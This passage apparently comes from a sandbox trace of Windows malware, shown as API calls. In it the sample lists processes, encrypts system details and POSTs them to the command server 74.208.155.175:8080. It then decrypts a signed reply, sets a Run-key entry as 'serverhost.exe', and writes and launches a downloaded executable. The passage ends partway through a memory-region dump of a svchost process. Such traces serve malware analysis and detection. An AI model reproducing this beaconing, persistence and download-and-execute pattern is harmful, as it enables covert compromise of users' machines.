returned="csrss.exe" [0063.044] lstrlenW (lpString="csrss.exe") returned 9 [0063.044] lstrcmpiW (lpString1="smss.exe", lpString2="serverhost.exe") returned 1 [0063.044] lstrcpyW (in: lpString1=0x61c7ea, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0063.044] lstrlenW (lpString="smss.exe") returned 8 [0063.044] lstrcmpiW (lpString1="System", lpString2="serverhost.exe") returned 1 [0063.044] lstrcpyW (in: lpString1=0x61c7fc, lpString2="System" | out: lpString1="System") returned="System" [0063.044] lstrlenW (lpString="System") returned 6 [0063.044] lstrcmpiW (lpString1="[System Process]", lpString2="serverhost.exe") returned -1 [0063.044] lstrcpyW (in: lpString1=0x61c80a, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0063.044] lstrlenW (lpString="[System Process]") returned 16 [0063.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPPSVC.EXE,WINWORD.EXE,nerve-bracelet.exe,lease-entitled-pcs.exe,lighter.exe,distributors.exe,advocate-keep.exe,irish.exe,fifth roller.exe,evanescence oscar em.exe,remained universe sole.exe,panel-maria-suggestion.exe,invalid.exe,myers biggest qatar.exe,info-began-nobody-tops.exe,chargetrackbacksobserve.exe,designed.exe,food_logos_lot.exe,enterprise monsters comments.exe,involved-int-antenna-lol.exe,lyrics-morning-effectiveness.exe,bookings.exe,output.exe,argentina conducting merchandise.exe,blowiranlaboratorydisaster.exe,taskeng.exe,explorer.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],", cchWideChar=710, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 710 [0063.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPPSVC.EXE,WINWORD.EXE,nerve-bracelet.exe,lease-entitled-pcs.exe,lighter.exe,distributors.exe,advocate-keep.exe,irish.exe,fifth roller.exe,evanescence oscar em.exe,remained universe sole.exe,panel-maria-suggestion.exe,invalid.exe,myers biggest qatar.exe,info-began-nobody-tops.exe,chargetrackbacksobserve.exe,designed.exe,food_logos_lot.exe,enterprise monsters comments.exe,involved-int-antenna-lol.exe,lyrics-morning-effectiveness.exe,bookings.exe,output.exe,argentina conducting merchandise.exe,blowiranlaboratorydisaster.exe,taskeng.exe,explorer.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],", cchWideChar=710, lpMultiByteStr=0x61c858, cbMultiByte=710, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSPPSVC.EXE,WINWORD.EXE,nerve-bracelet.exe,lease-entitled-pcs.exe,lighter.exe,distributors.exe,advocate-keep.exe,irish.exe,fifth roller.exe,evanescence oscar em.exe,remained universe sole.exe,panel-maria-suggestion.exe,invalid.exe,myers biggest qatar.exe,info-began-nobody-tops.exe,chargetrackbacksobserve.exe,designed.exe,food_logos_lot.exe,enterprise monsters comments.exe,involved-int-antenna-lol.exe,lyrics-morning-effectiveness.exe,bookings.exe,output.exe,argentina conducting merchandise.exe,blowiranlaboratorydisaster.exe,taskeng.exe,explorer.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],", lpUsedDefaultChar=0x0) returned 710 [0063.044] RtlGetVersion (in: lpVersionInformation=0x18bfc18 | out: lpVersionInformation=0x18bfc18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0063.045] GetNativeSystemInfo (in: lpSystemInfo=0x18bfd34 | out: lpSystemInfo=0x18bfd34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0063.045] lstrlenA (lpString="F71GWAT_78B95E2E") returned 16 [0063.047] CryptDuplicateHash (in: hHash=0x615c20, pdwReserved=0x0, dwFlags=0x0, phHash=0x18bfc4c | out: phHash=0x18bfc4c) returned 1 [0063.048] CryptEncrypt (in: hKey=0x615940, hHash=0x61d080, Final=1, dwFlags=0x0, pbData=0x61ce94*, pdwDataLen=0x18bfc34*=0x1d5, dwBufLen=0x1e0 | out: pbData=0x61ce94*, pdwDataLen=0x18bfc34*=0x1e0) returned 1 [0063.048] CryptExportKey (in: hKey=0x615940, hExpKey=0x613108, dwBlobType=0x1, dwFlags=0x40, pbData=0x18bfbc8, pdwDataLen=0x18bfc38 | out: pbData=0x18bfbc8*, pdwDataLen=0x18bfc38*=0x6c) returned 1 [0063.049] CryptGetHashParam (in: hHash=0x61d080, dwParam=0x2, pbData=0x61ce80, pdwDataLen=0x18bfc38, dwFlags=0x0 | out: pbData=0x61ce80, pdwDataLen=0x18bfc38) returned 1 [0063.049] CryptDestroyHash (hHash=0x61d080) returned 1 [0063.049] _snwprintf (in: _Dest=0x18bfc60, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="74.208.155.175") returned 14 [0063.049] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x18bfa3c, cbSize=0x18bfc3c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x18bfc3c) returned 0x0 [0063.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18bfa3c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 184 [0063.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18bfa3c, cbMultiByte=-1, lpWideCharStr=0x61d7e0, cchWideChar=184 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)") returned 184 [0063.052] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0063.109] InternetConnectW (hInternet=0xcc0004, lpszServerName="74.208.155.175", nServerPort=0x1f90, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0063.110] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName=0x0, lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844cc300, dwContext=0x0) returned 0xcc000c [0063.111] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x61ce20*, dwOptionalLength=0x254 | out: lpOptional=0x61ce20*) returned 1 [0066.761] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x18bfd28, lpdwBufferLength=0x18bfc48, lpdwIndex=0x0 | out: lpBuffer=0x18bfd28*, lpdwBufferLength=0x18bfc48*=0x4, lpdwIndex=0x0) returned 1 [0066.761] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x18bfc38, lpdwBufferLength=0x18bfc40, lpdwIndex=0x0 | out: lpBuffer=0x18bfc38*, lpdwBufferLength=0x18bfc40*=0x4, lpdwIndex=0x0) returned 1 [0066.761] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x661040, dwNumberOfBytesToRead=0xf254, lpdwNumberOfBytesRead=0x18bfc3c | out: lpBuffer=0x661040*, lpdwNumberOfBytesRead=0x18bfc3c*=0xf254) returned 1 [0067.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x670294, dwNumberOfBytesToRead=0x0, lpdwNumberOfBytesRead=0x18bfc3c | out: lpBuffer=0x670294*, lpdwNumberOfBytesRead=0x18bfc3c*=0x0) returned 1 [0067.716] CryptDuplicateHash (in: hHash=0x615c20, pdwReserved=0x0, dwFlags=0x0, phHash=0x18bfc40 | out: phHash=0x18bfc40) returned 1 [0067.716] CryptDecrypt (in: hKey=0x615940, hHash=0x625728, Final=1, dwFlags=0x0, pbData=0x6702a0, pdwDataLen=0x18bfd38 | out: pbData=0x6702a0, pdwDataLen=0x18bfd38) returned 1 [0067.718] CryptVerifySignatureW (hHash=0x625728, pbSignature=0x661040, dwSigLen=0x60, hPubKey=0x613108, szDescription=0x0, dwFlags=0x0) returned 1 [0067.718] CryptDestroyHash (hHash=0x625728) returned 1 [0067.723] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0067.723] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0067.723] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0067.724] _snwprintf (in: _Dest=0x18bfb44, _Count=0x104, _Format="\"%s\"" | out: _Dest="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"") returned 73 [0067.724] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x18bfd4c, lpdwDisposition=0x0 | out: phkResult=0x18bfd4c*=0x378, lpdwDisposition=0x0) returned 0x0 [0067.724] RegSetValueExW (in: hKey=0x378, lpValueName="serverhost", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", cbData=0x94 | out: lpData="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"") returned 0x0 [0067.724] RegCloseKey (hKey=0x378) returned 0x0 [0067.724] GetLastError () returned 0x0 [0067.724] GetLastError () returned 0x0 [0067.724] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.725] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.726] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.727] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.728] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.729] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.730] GetLastError () returned 0x0 [0067.928] _snwprintf (in: _Dest=0x18bfa70, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe") returned 77 [0068.019] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378 [0068.100] WriteFile (in: hFile=0x378, lpBuffer=0x67f48c*, nNumberOfBytesToWrite=0x17000, lpNumberOfBytesWritten=0x18bfd50, lpOverlapped=0x0 | out: lpBuffer=0x67f48c*, lpNumberOfBytesWritten=0x18bfd50*=0x17000, lpOverlapped=0x0) returned 1 [0068.102] CloseHandle (hObject=0x378) returned 1 [0068.180] CreateProcessW (in: lpApplicationName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18bfcf8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18bfd40 | out: lpCommandLine=0x0, lpProcessInformation=0x18bfd40*(hProcess=0x37c, hThread=0x378, dwProcessId=0xbdc, dwThreadId=0xbe0)) returned 1 [0068.189] CloseHandle (hObject=0x37c) returned 1 [0068.189] CloseHandle (hObject=0x378) returned 1 [0068.413] GetTickCount () returned 0x18aff [0069.194] GetTickCount () returned 0x18e1b [0070.224] GetTickCount () returned 0x19221 [0071.206] GetTickCount () returned 0x195f7 [0072.204] GetTickCount () returned 0x199de Thread: id = 39 os_tid = 0xb1c Thread: id = 40 os_tid = 0xb20 [0066.136] GetTickCount () returned 0x18229 [0067.135] GetTickCount () returned 0x18610 [0068.183] GetTickCount () returned 0x18a25 Thread: id = 41 os_tid = 0xb24 Thread: id = 42 os_tid = 0xb2c Thread: id = 59 os_tid = 0xb34 [0065.138] GetTickCount () returned 0x17e43 Thread: id = 60 os_tid = 0xb38 Thread: id = 61 os_tid = 0xb3c Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7eef7200" os_pid = "0x3e0" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0xb04" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bd6a" [0xc000000f], "LOCAL" [0x7] Region: id = 1120 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1121 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1122 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1123 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1124 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 1125 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 1126 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1127 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1128 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1129 start_va = 0xd0000 end_va = 0xdffff entry_point = 0xd0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1130 start_va = 0xe0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1131 start_va = 0x1e0000 end_va = 0x246fff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1132 start_va = 0x250000 end_va = 0x253fff entry_point = 0x250000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1133 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1134 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1135 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1136 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1137 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1138 start_va = 0x4b0000 end_va = 0x52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1139 start_va = 0x530000 end_va = 0x922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1140 start_va = 0x930000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 1141 start_va = 0x970000 end_va = 0x970fff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 1142 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 1143 start_va = 0x9e0000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 1144 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 1145 start_va = 0xac0000 end_va = 0xd8efff entry_point = 0xac0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1146 start_va = 0xdb0000 end_va = 0xdb7fff entry_point = 0xdb0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1147 start_va = 0xdc0000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1148 start_va = 0xe50000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 1149 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 1150 start_va = 0xf70000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 1151 start_va = 0x1030000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1152 start_va = 0x1080000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1153 start_va = 0x10d0000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1154 start_va = 0x1130000 end_va = 0x116ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1155 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1156 start_va = 0x11b0000 end_va = 0x12affff entry_point = 0x0 